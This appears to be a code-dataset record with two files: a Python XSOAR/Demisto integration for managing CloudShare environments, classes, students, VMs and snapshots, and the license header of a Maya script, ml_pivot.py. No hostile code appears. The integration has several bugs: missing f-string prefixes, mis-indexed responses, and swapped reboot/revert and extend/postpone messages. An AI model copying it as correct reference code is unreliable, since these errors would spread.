filename | text
---|---|
the-stack_106_12903
|
import urllib3
import cloudshare
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
''' IMPORTS '''
# Disable insecure warnings
urllib3.disable_warnings()
''' CONSTANTS '''
''' CLIENT CLASS '''
class Client():
def __init__(self, hostname: str, api_id: str = None, api_key: str = None):
self.hostname = hostname
self.apiId = api_id
self.apiKey = api_key
def send_request(self, method: str, path: str, queryParams: dict = None, content: dict = None):
res = cloudshare.req(
hostname=self.hostname,
method=method,
path=path,
apiId=self.apiId,
apiKey=self.apiKey,
queryParams=queryParams,
content=content
)
return res
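# Minimal usage sketch (the hostname and credentials below are placeholders, not values
# taken from this integration): every command handler that follows funnels through this
# wrapper in the same way.
#
# client = Client(hostname='use.cloudshare.com', api_id='<API_ID>', api_key='<API_KEY>')
# res = client.send_request('GET', 'ping')
# print(res.status, res.content)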
''' HELPER FUNCTIONS '''
def test_module_command(client, args):
res = client.send_request(
'GET',
'ping'
)
if res.status == 200:
if "result" in res.content and res.content['result'] == "Pong":
return_results('ok')
else:
return_error(res.content)
else:
return_error(res.content)
def get_projects_command(client, args):
queryParams = {
"WhereUserIsProjectManager": True if args.get('WhereUserIsProjectManager', 'false') == 'true' else False,
"WhereUserIsProjectMember": True if args.get('WhereUserIsProjectMember', 'false') == 'true' else False,
"WhereUserCanCreateClass": True if args.get('WhereUserCanCreateClass', 'false') == 'true' else False
}
res = client.send_request(
'GET',
'projects',
queryParams=queryParams
)
if res.status == 200:
md = tableToMarkdown('CloudShare Projects:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Projects",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting projects - {res.content}")
def get_project_command(client, args):
projectId = args.get('projectId')
res = client.send_request(
'GET',
f'projects/{projectId}'
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare Project {projectId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Projects",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting project - {res.content}")
def get_project_policies_command(client, args):
projectId = args.get('projectId')
res = client.send_request(
'GET',
f'projects/{projectId}/policies'
)
if res.status == 200:
policies = {
"id": projectId,
"Policies": res.content
}
md = tableToMarkdown(f'CloudShare Project Policies for {projectId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Projects",
outputs_key_field='id',
outputs=policies if policies else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting project policies - {res.content}")
def get_project_blueprints_command(client, args):
projectId = args.get('projectId')
queryParams = {k: v for k, v in args.items() if k != 'projectId'}
res = client.send_request(
'GET',
f'projects/{projectId}/blueprints',
queryParams=queryParams
)
if res.status == 200:
blueprints = {
"id": projectId,
"Blueprints": res.content if res.content else None
}
md = tableToMarkdown(f'CloudShare Project Blueprints for {projectId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Projects",
outputs_key_field='id',
outputs=blueprints if blueprints else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting project blueprints - {res.content}")
def get_project_blueprint_command(client, args):
projectId = args.get('projectId')
blueprintId = args.get('blueprintId', None)
res = client.send_request(
'GET',
f'projects/{projectId}/blueprints/{blueprintId}'
)
if res.status == 200:
blueprints = {
"id": projectId,
"Blueprints": res.content if res.content else None
}
md = tableToMarkdown(f'CloudShare Blueprint ID {blueprintId} for Project {projectId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Projects",
outputs_key_field='id',
outputs=blueprints if blueprints else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting project blueprint - {res.content}")
def get_classes_command(client, args):
res = client.send_request(
'GET',
'class'
)
if res.status == 200:
md = tableToMarkdown('CloudShare classes:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving classes - {res.content}")
def get_class_command(client, args):
classId = args.get('classId')
res = client.send_request(
'GET',
f'class/{classId}'
)
if res.status == 200:
md = tableToMarkdown('CloudShare classes:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error finding class - {res.content}")
def delete_class_command(client, args):
classId = args.get('classId')
res = client.send_request(
'DELETE',
f'class/{classId}'
)
if res.status == 200:
return_results("Class {classId} deleted successfully")
else:
return_error(f"Error deleteing class {classId} - {res.content}")
def delete_class_environments_command(client, args):
classId = args.get('classId')
res = client.send_request(
'DELETE',
'class/actions/deleteallenvironments',
content={"id": classId}
)
if res.status == 200:
results = {
"failed": res[0].get('failed', []),
"succeed": res[0].get('succeed', [])
}
for k, v in results.items():
md = tableToMarkdown(f'CloudShare class {classId} environments deletion ({k}):', v)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes.Actions.Delete.{k}",
outputs_key_field='id',
outputs=v if v else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error deleteing class {classId} environments - {res.content}")
def get_classes_countries_command(client, args):
res = client.send_request(
'GET',
'class/actions/countries',
queryParams={"fullCountriesList": True}
)
if res.status == 200:
md = tableToMarkdown('CloudShare classes countries:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes.Countries",
outputs_key_field='code',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving countries - {res.content}")
def get_classes_customfields_command(client, args):
projectId = args.get('projectId')
res = client.send_request(
'GET',
'class/actions/customfields',
queryParams={"projectId": projectId}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare project {projectId} classes custom fields:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes.CustomFields",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving custom fields - {res.content}")
def get_classes_detailed_command(client, args):
classId = args.get('classId')
res = client.send_request(
'GET',
'class/actions/getdetailed',
queryParams={"classId": classId}
)
if res.status == 200:
res.content['id'] = classId
md = tableToMarkdown(f'CloudShare class {classId} details:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving details - {res.content}")
def get_classes_instructors_command(client, args):
policyId = args.get('policyId')
res = client.send_request(
'GET',
'class/actions/instructors',
queryParams={"policyId": policyId}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare class instructors under policy {policyId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes.Instructors",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving details - {res.content}")
def create_class_command(client, args):
res = client.send_request(
'POST',
'class',
content={k: True if v == 'true' else False if v == 'false' else v for k, v in args.items()}
)
if res.status == 200:
res.content.update(args)
md = tableToMarkdown('CloudShare create new class:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error creating new class - {res.content}")
def send_class_invitations_command(client, args):
classId = args.get('classId')
studentIds = args.get('studentIds').replace(" ", "").split(",")
res = client.send_request(
'POST',
'class/actions/sendinvitations',
queryParams={"isMultiple": True},
content={
"classId": classId,
"studentIds": studentIds
}
)
if res.status == 200:
return_results(f"Invitations sent for class {classId} successfully.")
else:
return_error(f"Error sending invitations - {res.content}")
def suspend_class_environments_command(client, args):
classId = args.get('classId')
res = client.send_request(
'PUT',
'class/actions/suspendallenvironments',
content={"id": classId}
)
if res.status == 200:
results = {
"failed": res[0].get('failed', []),
"succeed": res[0].get('succeed', [])
}
for k, v in results.items():
md = tableToMarkdown(f'CloudShare class {classId} environments suspension ({k}):', v)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes.Actions.Suspend.{k}",
outputs_key_field='id',
outputs=v if v else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error suspending class {classId} environments - {res.content}")
def modify_class_command(client, args):
classId = args.get('classId')
res = client.send_request(
'PUT',
f'class/{classId}',
content={k: True if v == 'true' else False if v == 'false' else v for k, v in args.items() if k != 'classId'}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare modify class {classId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Classes",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error modifying class {classId} - {res.content}")
def get_students_command(client, args):
classId = args.get('classId')
res = client.send_request(
'GET',
f'class/{classId}/students',
queryParams={
"isFull": True if args.get('isFull', 'false') == 'true' else False
}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare students for class {classId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Students",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving students for class {classId} - {res.content}")
def get_student_command(client, args):
classId = args.get('classId')
studentId = args.get('studentId')
res = client.send_request(
'GET',
f'class/{classId}/students/{studentId}'
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare student {studentId} for class {classId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Students",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving students for class {classId} - {res.content}")
def delete_student_command(client, args):
classId = args.get('classId')
studentId = args.get('studentId')
res = client.send_request(
'DELETE',
f'class/{classId}/students/{studentId}'
)
if res.status == 200:
return_results("Successfully deleted student {studentId} from class {classId}")
else:
return_error(f"Error deleting student {studentId} from class {classId} - {res.content}")
def register_student_command(client, args):
classId = args.get('classId')
res = client.send_request(
'POST',
f'class/{classId}/students',
content={k: v for k, v in args.items() if k != 'classId'}
)
if res.status == 200:
results = {"id": v for k, v in res.contents.items() if k == 'studentId'}
md = tableToMarkdown(f'CloudShare registered student for class {classId}:', results)
command_results = CommandResults(
outputs_prefix="CloudShare.Students",
outputs_key_field='id',
outputs=results if results else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving students for class {classId} - {res.content}")
def modify_student_command(client, args):
classId = args.get('classId')
studentId = args.get('studentId')
res = client.send_request(
'PUT',
f'class/{classId}/students/{studentId}',
content={k: v for k, v in args.items() if k != 'classId' and k != 'studentId'}
)
if res.status == 200:
return_results(f"Student {studentId} modified in class {classId} successfully")
else:
return_error(f"Error modifying student {studentId} for class {classId} - {res.content}")
def get_regions_command(client, args):
res = client.send_request(
'GET',
'regions'
)
if res.status == 200:
md = tableToMarkdown('CloudShare regions:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Regions",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving regions - {res.content}")
def get_timezones_command(client, args):
res = client.send_request(
'GET',
'timezones'
)
if res.status == 200:
md = tableToMarkdown('CloudShare timezones:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Timezones",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving timezones - {res.content}")
def get_envs_command(client, args):
owned = True if args.get('owned', 'false') == 'true' else False
visible = True if args.get('visible', 'false') == 'true' else False
owner_email = args.get('ownerEmail', None)
class_id = args.get('classId', None)
brief = args.get('brief', 'false')
queryParams = dict()
if owned or visible:
owned_visible = list()
if owned:
owned_visible.append('allowned')
if visible:
owned_visible.append('allvisible')
queryParams['criteria'] = ','.join(owned_visible) if owned_visible else None
if owner_email:
queryParams['ownerEmail'] = owner_email
if class_id:
queryParams['classId'] = class_id
if brief:
queryParams['brief'] = brief
res = client.send_request(
'GET',
'envs',
queryParams=queryParams
)
if res.status == 200:
md = tableToMarkdown('CloudShare Environments:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting environments - {res.content}")
def get_env_resources_command(client, args):
envId = args.get('envId')
res = client.send_request(
'GET',
'envs/actions/getenvresources',
queryParams={"envId": envId}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare Environment {envId} Resources:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.EnvironmentResources",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting environments - {res.content}")
def get_env_extended_command(client, args):
envId = args.get('envId')
res = client.send_request(
'GET',
'envs/actions/getextended',
queryParams={"envId": envId}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare Environment {envId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting extended environment {envId} - {res.content}")
def get_env_extended_vanity_command(client, args):
machineVanity = args.get('machineVanity')
res = client.send_request(
'GET',
'envs/actions/getextendedbymachinevanity',
queryParams={"machineVanity": machineVanity}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare Environment for machine vanity {machineVanity}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting extended environment - {res.content}")
def get_env_extended_token_command(client, args):
sponsoredLoginToken = args.get('sponsoredLoginToken')
res = client.send_request(
'GET',
'envs/actions/getextendedbytoken',
queryParams={"sponsoredLoginToken": sponsoredLoginToken}
)
if res.status == 200:
md = tableToMarkdown('CloudShare Environment:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting extended environment - {res.content}")
def get_env_multiple_resources_command(client, args):
res = client.send_request(
'GET',
'envs/actions/getmultipleenvsresources',
queryParams={k: v for k, v in args.items()}
)
if res.status == 200:
md = tableToMarkdown(f"CloudShare Environment Resources from {args.get('starttime')} to {args.get('endtime')}:", res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.EnvironmentResources",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error getting environment resources - {res.content}")
def extend_env_command(client, args):
envId = args.get('envId')
res = client.send_request(
'PUT',
'envs/actions/extend',
queryParams={"envId": envId}
)
if res.status == 200:
return_results(f"Postpone environment {envId} suspend successful")
else:
return_error(f"Error postponing environment {envId} suspension- {res.content}")
def postpone_env_suspend_command(client, args):
envId = args.get('envId')
res = client.send_request(
'PUT',
'envs/actions/postponeinactivity',
queryParams={"envId": envId}
)
if res.status == 200:
return_results(f"Extend environment {envId} successful")
else:
return_error(f"Error extended environment {envId} - {res.content}")
def resume_env_command(client, args):
envId = args.get('envId')
res = client.send_request(
'PUT',
'envs/actions/resume',
queryParams={"envId": envId}
)
if res.status == 200:
return_results(f"Environment {envId} resumed successfully")
else:
return_error(f"Error resuming environment {envId} - {res.content}")
def revert_env_command(client, args):
envId = args.get('envId')
snapshotId = args.get('snapshotId')
res = client.send_request(
'PUT',
'envs/actions/revert',
queryParams={"envId": envId, "snapshotId": snapshotId}
)
if res.status == 200:
return_results(f"Environment {envId} reverted to snapshot {snapshotId} successfully")
else:
return_error(f"Error reverting environment {envId} to snapshot {snapshotId} - {res.content}")
def suspend_env_command(client, args):
envId = args.get('envId')
res = client.send_request(
'PUT',
'envs/actions/suspend',
queryParams={"envId": envId}
)
if res.status == 200:
return_results(f"Environment {envId} suspended successfully")
else:
return_error(f"Error suspending environment {envId} - {res.content}")
def get_env_command(client, args):
envID = args.get('envID')
res = client.send_request(
'GET',
f'envs/{envID}',
queryParams={k: v for k, v in args.items()}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare Environment {envID}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error suspending environment {envID} - {res.content}")
def delete_env_command(client, args):
envID = args.get('envID')
res = client.send_request(
'DELETE',
f'envs/{envID}'
)
if res.status == 200:
return_results(f"CloudShare Environment {envID} deleted successfully")
else:
return_error(f"Error deleting environment {envID} - {res.content}")
def create_env_command(client, args):
res = client.send_request(
'POST',
'envs',
content={k: v for k, v in args.items()}
)
if res.status == 200:
res.content['id'] = res.content.get('environmentId')
md = tableToMarkdown('CloudShare Environment Created:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error creating environment - {res.content}")
def modify_env_command(client, args):
envId = args.get('envId')
res = client.send_request(
'PUT',
'envs',
content={"envId": envId}
)
if res.status == 200:
res.content['id'] = res.content.get('environmentId')
md = tableToMarkdown(f'CloudShare Environment {envId} Modified:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Environments",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error creating environment - {res.content}")
def delete_vm_command(client, args):
VmID = args.get('VmID')
res = client.send_request(
'DELETE',
f'vms/{VmID}'
)
if res.status == 200:
res.content['id'] = res.content.get('environmentId')
return_results(f"CloudShare VM {VmID} deleted successfully")
else:
return_error(f"Error deleting VM {VmID} - {res.content}")
def vm_check_execution_status_command(client, args):
vmID = args.get('vmID')
executionId = args.get('executionId')
res = client.send_request(
'GET',
'vms/actions/checkexecutionstatus',
queryParams={"vmID": vmID, "executionId": executionId}
)
if res.status == 200:
md = tableToMarkdown(f'VM {vmID} execution {executionId} status:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.VM.Executions",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving {vmID} execution {executionId} status - {res.content}")
def vm_get_remote_command(client, args):
VmID = args.get('VmID')
res = client.send_request(
'GET',
'vms/actions/getremoteaccessfile',
queryParams={k: v for k, v in args.items()}
)
if res.status == 200:
res.content['VmID'] = VmID
md = tableToMarkdown(f'VM {VmID} remote file:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.VM.Remote",
outputs_key_field='VmID',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving {VmID} remote file - {res.content}")
def vm_execute_command(client, args):
vmId = args.get('vmId')
res = client.send_request(
'POST',
'vms/actions/executepath',
content={"vmId": vmId}
)
if res.status == 200:
md = tableToMarkdown(f'VM {vmId} execute task:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.VM.Execute",
outputs_key_field='executionId',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error executing command on VM {vmId} - {res.content}")
def vm_modify_hardware_command(client, args):
vmID = args.get('vmID')
res = client.send_request(
'PUT',
'vms/actions/editvmhardware',
content={"vmID": vmID}
)
if res.status == 200:
res.content['id'] = vmID
md = tableToMarkdown(f'Modify VM {vmID} hardware:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.VM.Modify",
outputs_key_field='vmID',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error modifying VM {vmID} - {res.content}")
def reboot_vm_command(client, args):
VmID = args.get('VmID')
res = client.send_request(
'PUT',
'vms/actions/reboot',
queryParams={"VmID": VmID}
)
if res.status == 200:
return_results(f"Revert of VM {VmID} successful")
else:
return_error(f"Error reverting VM {VmID} - {res.content}")
def revert_vm_command(client, args):
VmID = args.get('VmID')
res = client.send_request(
'PUT',
'vms/actions/revert',
queryParams={"VmID": VmID}
)
if res.status == 200:
return_results(f"Reboot of VM {VmID} successful")
else:
return_error(f"Error reverting VM {VmID} - {res.content}")
def get_cloud_folders_command(client, args):
res = client.send_request(
'GET',
'cloudfolders/actions/getall'
)
if res.status == 200:
md = tableToMarkdown('CloudShare folders:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Folders",
outputs_key_field=['host', 'path'],
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving folders - {res.content}")
def get_env_cloud_folders_command(client, args):
EnvId = args.get('EnvId')
res = client.send_request(
'PUT',
'cloudfolders/actions/mount',
queryParams={"EnvId": EnvId}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare folders for env {EnvId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.EnvFolders",
outputs_key_field=['name', 'token'],
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving env {EnvId} folders - {res.content}")
def generate_password_folder_command(client, args):
res = client.send_request(
'PUT',
'cloudfolders/actions/regeneratecloudfolderspassword'
)
if res.status == 200:
md = tableToMarkdown('CloudShare password for folders:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.FoldersPassword",
outputs_key_field='newFtpUri',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error generating password - {res.content}")
def unmount_env_folders_command(client, args):
EnvId = args.get('EnvId')
res = client.send_request(
'PUT',
'cloudfolders/actions/unmount',
queryParams={"EnvId": EnvId}
)
if res.status == 200:
return_results(f"Unmounted env {EnvId} folders successfully")
else:
return_error(f"Error unmounting env {EnvId} folders - {res.content}")
def get_templates_command(client, args):
queryParams = {k: v for k, v in args.items()}
if "skip" in queryParams:
queryParams['skip'] = int(queryParams['skip'])
if "take" in queryParams:
queryParams['take'] = int(queryParams['take'])
res = client.send_request(
'GET',
'templates',
queryParams=queryParams
)
if res.status == 200:
md = tableToMarkdown('CloudShare env templates:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Templates",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving templates - {res.content}")
def get_snapshot_command(client, args):
snapshotID = args.get('snapshotID')
res = client.send_request(
'GET',
f'snapshots/{snapshotID}'
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare snapshot {snapshotID}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Snapshots",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving snapshot {snapshotID} - {res.content}")
def get_env_snapshots_command(client, args):
envId = args.get('envId')
res = client.send_request(
'GET',
'snapshots/actions/getforenv',
queryParams={"envId": envId}
)
if res.status == 200:
md = tableToMarkdown(f'CloudShare snapshots for env {envId}:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Snapshots",
outputs_key_field='id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving snapshots for env {envId} - {res.content}")
def mark_default_snapshot_command(client, args):
snapshotID = args.get('snapshotID')
res = client.send_request(
'PUT',
'snapshots/actions/markdefault',
queryParams={"id": snapshotID}
)
if res.status == 200:
return_results("Snapshot {snapshotID} set as default successfully")
else:
return_error(f"Error setting snapshot {snapshotID} as default - {res.content}")
def take_snapshot_env_command(client, args):
envId = args.get('envId')
content = {k: v for k, v in args.items()}
res = client.send_request(
method='POST',
path='snapshots/actions/takesnapshot',
content=content
)
if res.status == 200:
return_results("Snapshot of env {envId} taken successfully")
else:
return_error(f"Error taking snapshot of {envId} - {res.content}")
def get_teams_command(client, args):
res = client.send_request(
'GET',
'teams'
)
if res.status == 200:
md = tableToMarkdown('CloudShare teams:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Teams",
outputs_key_field='Id',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving teams - {res.content}")
def invite_user_poc_command(client, args):
content = {k: True if v == 'true' else False if v == 'false' else v for k, v in args.items()}
res = client.send_request(
method='POST',
path='invitations/actions/invitetopoc',
content=content
)
if res.status == 200:
md = tableToMarkdown('CloudShare invite:', res.content)
command_results = CommandResults(
outputs_prefix="CloudShare.Invites",
outputs_key_field='invitationDetailsUrl',
outputs=res.content if res.content else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving teams - {res.content}")
def get_poc_invitations_command(client, args):
res = client.send_request(
method='GET',
path='ProofOfConceptInvitations/Rows',
queryParams={k: v for k, v in args.items()}
)
if res.status == 200:
rows = res.content.get('rows')
md = tableToMarkdown('CloudShare POC invites:', rows)
command_results = CommandResults(
outputs_prefix="CloudShare.POCInvites",
outputs_key_field='id',
outputs=rows if rows else None,
readable_output=md
)
return_results(command_results)
else:
return_error(f"Error retrieving invitations - {res.content}")
''' MAIN FUNCTION '''
def main() -> None:
params = demisto.params()
args = demisto.args()
hostname = params.get('hostname')
api_id = params.get('api_id')
api_key = params.get('api_key')
handle_proxy()
command = demisto.command()
demisto.debug(f'Command being called is {command}')
try:
commands = {
'cloudshare-get-envs': get_envs_command,
'cloudshare-get-projects': get_projects_command,
'cloudshare-get-project': get_project_command,
'cloudshare-get-project-policies': get_project_policies_command,
'cloudshare-get-project-blueprints': get_project_blueprints_command,
'cloudshare-get-project-blueprint': get_project_blueprint_command,
'cloudshare-get-classes': get_classes_command,
'cloudshare-get-class': get_class_command,
'cloudshare-delete-class': delete_class_command,
'cloudshare-delete-class-environemtns': delete_class_environments_command,
'cloudshare-get-classes-countries': get_classes_countries_command,
'cloudshare-get-classes-customfields': get_classes_customfields_command,
'cloudshare-get-classes-detailed': get_classes_detailed_command,
'cloudshare-get-classes-instructors': get_classes_instructors_command,
'cloudshare-create-class': create_class_command,
'cloudshare-send-class-invitations': send_class_invitations_command,
'cloudshare-suspend-class-environments': suspend_class_environments_command,
'cloudshare-modify-class': modify_class_command,
'cloudshare-get-students': get_students_command,
'cloudshare-get-student': get_student_command,
'cloudshare-delete-student': delete_student_command,
'cloudshare-register-student': register_student_command,
'cloudshare-modify-student': modify_student_command,
'cloudshare-get-regions': get_regions_command,
'cloudshare-get-timezones': get_timezones_command,
'cloudshare-get-env-resource': get_env_resources_command,
'cloudshare-get-env-extended': get_env_extended_command,
'cloudshare-get-env-extended-vanity': get_env_extended_vanity_command,
'cloudshare-get-env-extended-token': get_env_extended_token_command,
'cloudshare-get-env-multiple-resources': get_env_multiple_resources_command,
'cloudshare-extend-env': extend_env_command,
'cloudshare-postpone-env-suspend': postpone_env_suspend_command,
'cloudshare-resume-env': resume_env_command,
'cloudshare-revert-env': revert_env_command,
'cloudshare-suspend-env': suspend_env_command,
'cloudshare-get-env': get_env_command,
'cloudshare-delete-env': delete_env_command,
'cloudshare-create-env': create_env_command,
'cloudshare-modify-env': modify_env_command,
'cloudshare-delete-vm': delete_vm_command,
'cloudshare-check-vm-execution-status': vm_check_execution_status_command,
'cloudshare-get-vm-remote-access-file': vm_get_remote_command,
'cloudshare-execute-vm-command': vm_execute_command,
'cloudshare-modify-vm-hardware': vm_modify_hardware_command,
'cloudshare-reboot-vm': reboot_vm_command,
'cloudshare-revert-vm': revert_vm_command,
'cloudshare-get-cloud-folders': get_cloud_folders_command,
'cloudshare-get-env-cloud-folders': get_env_cloud_folders_command,
'cloudshare-generate-cloud-folder-password': generate_password_folder_command,
'cloudshare-unmount-env-folders': unmount_env_folders_command,
'cloudshare-get-templates': get_templates_command,
'cloudshare-get-snapshot': get_snapshot_command,
'cloudshare-get-env-snapshots': get_env_snapshots_command,
'cloudshare-mark-default-snapshot': mark_default_snapshot_command,
'cloudshare-take-snapshot-env': take_snapshot_env_command,
'cloudshare-get-teams': get_teams_command,
'cloudshare-invite-user-poc': invite_user_poc_command,
'cloudshare-get-poc-invitations': get_poc_invitations_command
}
client = Client(
hostname,
api_id=api_id,
api_key=api_key
)
if demisto.command() == 'test-module':
# This is the call made when pressing the integration Test button.
test_module_command(client, args)
else:
commands[command](client, args)
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
''' ENTRY POINT '''
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
|
the-stack_106_12904
|
# -= ml_pivot.py =-
# __ by Morgan Loomis
# ____ ___ / / http://morganloomis.com
# / __ `__ \/ / Revision 4
# / / / / / / / 2018-02-17
# /_/ /_/ /_/_/ _________
# /_________/
#
# ______________
# - -/__ License __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#
# Copyright 2018 Morgan Loomis
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# ___________________
# - -/__ Installation __/- - - - - - - - - - - - - - - - - - - - - - - - - -
#
# Copy this file into your maya scripts directory, for example:
# C:/Documents and Settings/user/My Documents/maya/scripts/ml_pivot.py
#
